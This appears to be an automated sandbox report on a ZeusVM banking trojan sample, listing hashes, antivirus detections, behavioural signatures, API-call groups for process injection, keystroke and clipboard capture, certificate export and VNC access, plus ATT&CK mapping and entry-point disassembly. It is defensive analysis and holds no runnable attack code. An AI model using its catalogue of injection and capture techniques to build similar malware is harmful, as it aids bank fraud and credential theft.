
Analysis Report GqSL8M2a72

Overview

General Information

Sample Name: GqSL8M2a72 (renamed file extension from none to exe)
Analysis ID: 355735
MD5: 4fc29198fcc9a9fe3b31f7549d54d8e9
SHA1: 5b112c77ea208d570eedaad0d5880e6fc19cffbc
SHA256: 98d8b13f297953a0b4f915e55cd527f0f1461d42b917b77aa99f05446f6fdd12
Tags: uncategorized, ZeuS

Most interesting Screenshot:

Detection

ZeusVM
Score: 92
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected ZeusVM e-Banking Trojan
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Multi AV Scanner detection for submitted file
Contains VNC / remote desktop functionality (version string found)
Injects a PE file into a foreign processes
Machine Learning detection for sample
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to enumerate network shares
Contains functionality to launch a process as a different user
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
May initialize a security null descriptor
Program does not show much activity (idle)
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • GqSL8M2a72.exe (PID: 1832 cmdline: 'C:\Users\user\Desktop\GqSL8M2a72.exe' MD5: 4FC29198FCC9A9FE3B31F7549D54D8E9)
    • GqSL8M2a72.exe (PID: 5864 cmdline: 'C:\Users\user\Desktop\GqSL8M2a72.exe' MD5: 4FC29198FCC9A9FE3B31F7549D54D8E9)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: GqSL8M2a72.exe | Avira: detected
Multi AV Scanner detection for submitted file
Source: GqSL8M2a72.exe | Virustotal: Detection: 86%
Source: GqSL8M2a72.exe | Metadefender: Detection: 72%
Source: GqSL8M2a72.exe | ReversingLabs: Detection: 88%
Machine Learning detection for sample
Source: GqSL8M2a72.exe | Joe Sandbox ML: detected
Source: 2.2.GqSL8M2a72.exe.400000.0.unpack | Avira: Label: TR/Kazy.MK
Source: 1.2.GqSL8M2a72.exe.5e0000.1.unpack | Avira: Label: TR/Kazy.MK
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 1_2_00401145 HeapAlloc,CryptStringToBinaryA,1_2_00401145
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0040A14E CryptUnprotectData,LocalFree,2_2_0040A14E
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0041764D CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,2_2_0041764D

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Unpacked PE file: 2.2.GqSL8M2a72.exe.400000.0.unpack
Uses 32bit PE files
Source: GqSL8M2a72.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0040969D GetFileAttributesExW,ReadProcessMemory,LoadLibraryW,GetProcAddress,SHGetFolderPathW,StrCmpNIW,FreeLibrary,NetUserEnum,NetUserGetInfo,NetApiBufferFree,NetApiBufferFree,SHGetFolderPathW,2_2_0040969D
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0041BA18 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,2_2_0041BA18
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0041BAD3 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,2_2_0041BAD3
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00406095 getaddrinfo,freeaddrinfo,getsockname,getpeername,recv,recvfrom,getaddrinfo,freeaddrinfo,sendto,recvfrom,sendto,select,2_2_00406095
Source: GqSL8M2a72.exe | String found in binary or memory: http://www.google.com/webhp
Source: GqSL8M2a72.exe, 00000001.00000002.197226170.000000000265E000.00000004.00000040.sdmp | String found in binary or memory: http://www.google.com/webhpLb
Source: GqSL8M2a72.exe, 00000002.00000002.197084539.0000000000401000.00000020.00000001.sdmp | String found in binary or memory: http://www.google.com/webhpbc
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00405EC6 GetClipboardData,GlobalLock,EnterCriticalSection,LeaveCriticalSection,GlobalUnlock,2_2_00405EC6
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00405D60 EnterCriticalSection,GetTickCount,LeaveCriticalSection,GetKeyboardState,ToUnicode,TranslateMessage,2_2_00405D60
Source: GqSL8M2a72.exe, 00000001.00000002.197104411.000000000068A000.00000004.00000020.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Detected ZeusVM e-Banking Trojan
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0040DB94 lstrcmpiA,lstrcmpiA,lstrcmpiA,CloseHandle,2_2_0040DB94
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00404C67 OpenWindowStationW,CreateWindowStationW,GetProcessWindowStation,OpenDesktopW,CreateDesktopW,GetCurrentThreadId,GetThreadDesktop,SetThreadDesktop,CloseDesktop,CloseWindowStation,2_2_00404C67
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 1_2_00401326 NtAllocateVirtualMemory,1_2_00401326
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 1_2_0042656B NtAllocateVirtualMemory,1_2_0042656B
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 1_2_0042694B CreateProcessW,NtGetContextThread,NtUnmapViewOfSection,SetUnhandledExceptionFilter,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,ExitProcess,1_2_0042694B
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 1_2_0042658E NtSetContextThread,NtResumeProcess,1_2_0042658E
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00415C2E NtQueryInformationProcess,CloseHandle,NtCreateThread,2_2_00415C2E
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00415CE5 NtCreateUserProcess,GetProcessId,GetThreadContext,SetThreadContext,VirtualFreeEx,CloseHandle,2_2_00415CE5
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00415781 NtCreateUserProcess,NtCreateThread,LdrLoadDll,GetFileAttributesExW,HttpSendRequestW,HttpSendRequestA,HttpSendRequestExW,HttpSendRequestExA,InternetCloseHandle,InternetReadFile,InternetReadFileExA,InternetQueryDataAvailable,HttpQueryInfoA,closesocket,send,WSASend,OpenInputDesktop,SwitchDesktop,DefWindowProcW,DefWindowProcA,DefDlgProcW,DefDlgProcA,DefFrameProcW,DefFrameProcA,DefMDIChildProcW,DefMDIChildProcA,CallWindowProcW,CallWindowProcA,RegisterClassW,RegisterClassA,RegisterClassExW,RegisterClassExA,BeginPaint,EndPaint,GetDCEx,GetDC,GetWindowDC,ReleaseDC,GetUpdateRect,GetUpdateRgn,GetMessagePos,GetCursorPos,SetCursorPos,SetCapture,ReleaseCapture,GetCapture,GetMessageW,GetMessageA,PeekMessageW,PeekMessageA,TranslateMessage,GetClipboardData,PFXImportCertStore,2_2_00415781
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00417CCA LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,2_2_00417CCA
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_004120CF InitiateSystemShutdownExW,ExitWindowsEx,2_2_004120CF
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0040F5BB CreateMutexW,GetLastError,CloseHandle,CloseHandle,ExitWindowsEx,OpenEventW,SetEvent,CloseHandle,CloseHandle,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,ReadProcessMemory,Sleep,IsWellKnownSid,GetFileAttributesExW,ReadProcessMemory,GetFileAttributesExW,VirtualFree,CreateEventW,WaitForSingleObject,WaitForMultipleObjects,CloseHandle,CloseHandle,CloseHandle,CloseHandle,2_2_0040F5BB
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_004190FB 2_2_004190FB
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00417559 2_2_00417559
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00401A63 2_2_00401A63
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00410F8B 2_2_00410F8B
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: String function: 0040101D appears 51 times
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Section loaded: skembuptpwnoq.dll
Source: GqSL8M2a72.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
Source: GqSL8M2a72.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine | Classification label: mal92.bank.troj.evad.winEXE@3/0@0/0
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0041D5F1 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertEnumCertificatesInStore,CertEnumCertificatesInStore,PFXExportCertStoreEx,PFXExportCertStoreEx,PFXExportCertStoreEx,CharLowerW,GetSystemTime,CertCloseStore,2_2_0041D5F1
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0041D766 CertOpenSystemStoreW,CertEnumCertificatesInStore,CertDuplicateCertificateContext,CertDeleteCertificateFromStore,CertEnumCertificatesInStore,CertCloseStore,2_2_0041D766
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00417A74 GetCurrentThread,OpenThreadToken,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,2_2_00417A74
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00417A1D CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,2_2_00417A1D
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0040A86D CoCreateInstance,2_2_0040A86D
Source: GqSL8M2a72.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: GqSL8M2a72.exe | Virustotal: Detection: 86%
Source: GqSL8M2a72.exe | Metadefender: Detection: 72%
Source: GqSL8M2a72.exe | ReversingLabs: Detection: 88%
Source: unknown | Process created: C:\Users\user\Desktop\GqSL8M2a72.exe 'C:\Users\user\Desktop\GqSL8M2a72.exe'
Source: unknown | Process created: C:\Users\user\Desktop\GqSL8M2a72.exe 'C:\Users\user\Desktop\GqSL8M2a72.exe'
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Process created: C:\Users\user\Desktop\GqSL8M2a72.exe 'C:\Users\user\Desktop\GqSL8M2a72.exe'

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Unpacked PE file: 2.2.GqSL8M2a72.exe.400000.0.unpack .text:ER;.rdata:R;.data:W; vs .text:ER;.data:W;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Unpacked PE file: 2.2.GqSL8M2a72.exe.400000.0.unpack
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00417CCA LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,2_2_00417CCA
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00401807 push FFFFFFF1h; ret 2_2_00401809
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00401CED push es; iretd 2_2_00401CFC
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_004093F2 push esi; iretd 2_2_004093F3
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00402383 push cs; ret 2_2_00402398
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_004023B9 push cs; iretd 2_2_004023C8
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00411779 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadImageW,GetIconInfo,GetCursorPos,DrawIcon,lstrcmpiW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,2_2_00411779
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0041BA18 PathRemoveFileSpecW,FindFirstFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,2_2_0041BA18
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0041BAD3 FindFirstFileW,Sleep,WaitForSingleObject,PathMatchSpecW,Sleep,Sleep,FindNextFileW,FindClose,2_2_0041BAD3
Source: GqSL8M2a72.exe | Binary or memory string: O1nvu1ctKOpA7eriBCpw6n8KOmhqynhk5NpS7zt6aKXNOvppepIl6mWFlZ9VmzJrWm5qYtXp1dqSKkm6aK8Vmzcrbmpqbx9S1WWbMGprLmpp1VqSKCp6a+LduuWdG68K5Zs26muC/jZp2OZdOqpqsapqtPoqemuWDjXafAn/umGqki16empi2m46ov4wYt43qmjeNyL9MCL+OmFi3jRo3jfmGq4x4mqCa5EivjOqb2WZNCjuSmL4b7Di/7CiaQt+ampi
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00415E14 LdrLoadDll,LdrGetDllHandle,LdrLoadDll,EnterCriticalSection,lstrcmpiW,LeaveCriticalSection,2_2_00415E14
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00417CCA LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessAsUserW,CloseHandle,CloseHandle,CloseHandle,FreeLibrary,2_2_00417CCA
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0040E636 mov edx, dword ptr fs:[00000030h] 2_2_0040E636
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 1_2_004015DA HeapCreate,GetProcessHeap,1_2_004015DA
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 1_2_0042694B CreateProcessW,NtGetContextThread,NtUnmapViewOfSection,SetUnhandledExceptionFilter,NtWriteVirtualMemory,NtWriteVirtualMemory,NtWriteVirtualMemory,NtProtectVirtualMemory,ExitProcess,1_2_0042694B

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Memory written: C:\Users\user\Desktop\GqSL8M2a72.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Process created: C:\Users\user\Desktop\GqSL8M2a72.exe 'C:\Users\user\Desktop\GqSL8M2a72.exe'
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_00419997 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorW,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,LocalFree,2_2_00419997
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_004164AA GetSystemTime,SystemTimeToFileTime,2_2_004164AA
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0041D595 GetUserNameExW,2_2_0041D595
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_004164D2 GetTimeZoneInformation,2_2_004164D2
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_0040E447 GetVersionExW,GetNativeSystemInfo,2_2_0040E447
Source: GqSL8M2a72.exe | Binary or memory string: S:(ML;;NRNWNX;;;LW)

Remote Access Functionality:

Contains VNC / remote desktop functionality (version string found)
Source: GqSL8M2a72.exe | String found in binary or memory: RFB 003.003
Source: GqSL8M2a72.exe | String found in binary or memory: RFB 003.003
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_004194EA socket,bind,listen,closesocket,2_2_004194EA
Source: C:\Users\user\Desktop\GqSL8M2a72.exe | Code function: 2_2_004197C8 socket,bind,closesocket,2_2_004197C8

Mitre Att&ck Matrix

The matrix is listed here per tactic column; the bracketed figure is the match-count badge attached to a technique in the original matrix, and techniques without a badge are the unmatched entries of the matrix template.

Initial Access: Valid Accounts [1]; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Native API [1]; Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: DLL Side-Loading [1]; Application Shimming [1]; Create Account [1]; Valid Accounts [1]; Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: DLL Side-Loading [1]; Application Shimming [1]; Valid Accounts [1]; Access Token Manipulation [11]; Process Injection [111]; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Deobfuscate/Decode Files or Information [1]; Obfuscated Files or Information [2]; Install Root Certificate [1]; Software Packing [22]; DLL Side-Loading [1]; Valid Accounts [1]; Access Token Manipulation [11]; Process Injection [111]
Credential Access: Input Capture [21]; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: System Time Discovery [2]; Account Discovery [1]; File and Directory Discovery [1]; System Information Discovery [3]; Network Share Discovery [1]; Security Software Discovery [11]; Process Discovery [1]; System Owner/User Discovery [1]
Lateral Movement: Remote Desktop Protocol [1]; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Archive Collected Data [1]; Input Capture [21]; Clipboard Data [1]; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Ingress Tool Transfer [1]; Encrypted Channel [2]; Remote Access Software [1]; Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: System Shutdown/Reboot [1]; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

Behavior Graph

(behavior graph image not captured)

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
GqSL8M2a72.exe | 86% | Virustotal |
GqSL8M2a72.exe | 78% | Metadefender |
GqSL8M2a72.exe | 88% | ReversingLabs | Win32.Trojan.Zeus
GqSL8M2a72.exe | 100% | Avira | HEUR/AGEN.1108096
GqSL8M2a72.exe | 100% | Joe Sandbox ML |

Dropped Files

No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.GqSL8M2a72.exe.400000.0.unpack | 100% | Avira | TR/Kazy.MK
2.0.GqSL8M2a72.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108090
1.0.GqSL8M2a72.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108090
1.2.GqSL8M2a72.exe.5e0000.1.unpack | 100% | Avira | TR/Kazy.MK
1.2.GqSL8M2a72.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1108090

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

No contacted domains info

Contacted IPs

No contacted IP infos

General Information

Joe Sandbox Version: 31.0.0 Emerald
Analysis ID: 355735
Start date: 21.02.2021
Start time: 15:03:09
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 2m 34s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: GqSL8M2a72 (renamed file extension from none to exe)
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 3
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal92.bank.troj.evad.winEXE@3/0@0/0
EGA Information: Failed
HDC Information:
  • Successful, ratio: 100% (good quality ratio 92.4%)
  • Quality average: 82.2%
  • Quality standard deviation: 29.9%
HCA Information: Failed
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): svchost.exe

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General

File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 6.080431308237134
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: GqSL8M2a72.exe
File size: 161962
MD5: 4fc29198fcc9a9fe3b31f7549d54d8e9
SHA1: 5b112c77ea208d570eedaad0d5880e6fc19cffbc
SHA256: 98d8b13f297953a0b4f915e55cd527f0f1461d42b917b77aa99f05446f6fdd12
SHA512: a023c11edff4e1059bb3e22edb53d9774c66b44379c3121b761e9fa276eae42aca7b15b82b45aef4fc829095c2c264728147bb840f36650e4566136a79f6fead
SSDEEP: 3072:sK9smc3K+aCj93AnXGaNkdrgm9nl0JdqFJG2GztR07IVgfXs7ZsFz6x:JfcVho2eaJnl0JoLGtzz074IsYOx
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%...a...a...a.......c.......`.......c...h...|...a...1.....).`.......`...Richa...................PE..L......<.................^.

File Icon

Icon Hash: 00828e8e8686b000

Static PE Info

General

Entrypoint: 0x40156c
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics: TERMINAL_SERVER_AWARE, NO_ISOLATION
Time Stamp: 0x3CAFB40C [Sun Apr 7 02:50:52 2002 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 3d72c2249f14f4cc74dd098fd236f98a

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
sub esp, 1Ch
push 0042713Ch
call dword ptr [00427024h]
test eax, eax
jne 00007F7554D791E7h
call 00007F7554D79239h
push edi
xor edi, edi
cmp dword ptr [004294ECh], edi
je 00007F7554D79221h
call 00007F7554D78FACh
test eax, eax
je 00007F7554D79218h
push esi
push 004270C4h
call 00007F7554D78C5Dh
mov esi, dword ptr [00427080h]
pop ecx
jmp 00007F7554D791F6h
lea eax, dword ptr [ebp-1Ch]
push eax
call dword ptr [00427088h]
lea eax, dword ptr [ebp-1Ch]
push eax
call dword ptr [00427060h]
push edi
push edi
push edi
lea eax, dword ptr [ebp-1Ch]
push eax
call esi
test eax, eax
jne 00007F7554D791C1h
pop esi
mov eax, dword ptr [00428278h]
pop edi
leave
retn 000Ch
push 004270C4h
call 00007F7554D78C1Eh
pop ecx
push 00000000h
push 0016FCD8h
push 00000000h
call dword ptr [0042702Ch]
mov dword ptr [0042A4F4h], eax
test eax, eax
jne 00007F7554D791F1h
call dword ptr [00427030h]
mov dword ptr [0042A4F4h], eax
test eax, eax
je 00007F7554D791FDh
call 00007F7554D78BEAh
mov eax, dword ptr [eax+30h]
mov dword ptr [004294ECh], eax
test eax, eax
je 00007F7554D791ECh
mov eax, dword ptr [00428278h]
jmp 00007F7554D791E6h
ret
mov eax, dword ptr [004294ECh]
mov eax, dword ptr [eax+10h]
mov ecx, dword ptr [eax+44h]

Rich Headers

Programming Language:
  • [LNK] VS2010 build 30319
  • [IMP] VS2008 SP1 build 30729

Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x271e0 | 0xb4 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x27000 | 0xac | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Sections

Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x25dc6 | 0x25e00 | False | 0.732924659653 | data | 5.98756571788 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rdata | 0x27000 | 0x632 | 0x800 | False | 0.43115234375 | zlib compressed data | 4.18800845972 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x28000 | 0x2538 | 0x400 | False | 0.626953125 | data | 4.83990809034 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ

Imports

DLL | Import
KERNEL32.dll | LocalAlloc, GetModuleHandleA, OutputDebugStringA, lstrcpyA, LoadLibraryA, GetProcAddress, HeapCreate, GetProcessHeap, ExitProcess, SetUnhandledExceptionFilter, HeapAlloc, lstrlenA
USER32.dll | GetActiveWindow, DispatchMessageW, UpdateWindow, SetWindowPos, CreateWindowExA, MessageBoxA, ShowWindow, FindWindowA, MessageBoxW, GetMessageW, SetFocus, TranslateMessage, DefWindowProcW
POWRPROF.dll | GetPwrCapabilities, IsPwrShutdownAllowed, IsPwrHibernateAllowed, GetActivePwrScheme
WINTRUST.dll | WintrustGetRegPolicyFlags
CRYPT32.dll | CryptStringToBinaryA, CertCreateCertificateChainEngine
imagehlp.dll | ImageEnumerateCertificates
WINMM.dll | mciSendStringW
CLUSAPI.dll | ClusterEnum

Network Behavior

No network behavior found

Code Manipulations

System Behavior

General

Start time: 15:03:53
Start date: 21/02/2021
Path: C:\Users\user\Desktop\GqSL8M2a72.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\GqSL8M2a72.exe'
Imagebase: 0x400000
File size: 161962 bytes
MD5 hash: 4FC29198FCC9A9FE3B31F7549D54D8E9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

General

Start time: 15:03:54
Start date: 21/02/2021
